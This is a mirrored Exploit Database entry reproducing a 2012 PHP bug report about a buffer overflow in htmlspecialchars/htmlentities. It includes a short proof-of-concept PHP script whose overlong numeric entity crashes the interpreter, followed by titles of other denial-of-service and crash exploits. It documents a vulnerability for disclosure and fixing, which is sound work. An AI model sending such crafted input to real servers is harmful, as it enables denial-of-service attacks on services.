PHP 5.4SVN-2012-02-03 – htmlspecialchars/entities Buffer Overflow

Exploit Database
114 阅读

作者： cataphract

日期： 2012-02-03
类别：
- dos
平台：
- php
来源：https://www.exploit-db.com/exploits/18458/

From: cataphract

Operating system: Any

PHP version:5.4SVN-2012-02-03 (SVN)

Package:Reproducible crash

Bug Type: Bug

Bug description:Buffer overflow on htmlspecialchars/entities with $double=false

Description:

------------

Long entities can cause a buffer overflow because the loop only guarantees

40 bytes available in beginning.

Test script:

---------------

<?php

echo

htmlspecialchars('"""""""""""""""""""""""""""""""""""""""""""""&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005;',

ENT_QUOTES, 'UTF-8', false), "\n";

last Exploits
PHP 5.4SVN-2012-02-03 – htmlspecialchars/entities Buffer Overflow的更多信息

Core FTP 2.0 build 653 – ‘PBSZ’ Denial of Service (PoC)：
4digits 1.1.4 – Local Buffer Overflow (PoC)：
Siemens SIMATIC S7-1500 CPU – Remote Denial of Service：
VideoLAN VLC Media Player 2.1.2 – ‘.asf’ Crash (PoC)：
Xmyplay 3.5.1 – Denial of Service：
Prime95 29.4b7 – Denial Of Service (PoC)：
Multiple Vendor ‘librpc.dll’ Signedness Error – Remote Code Execution：
Netwide Assembler (NASM) 2.14rc15 – NULL Pointer Dereference (PoC)：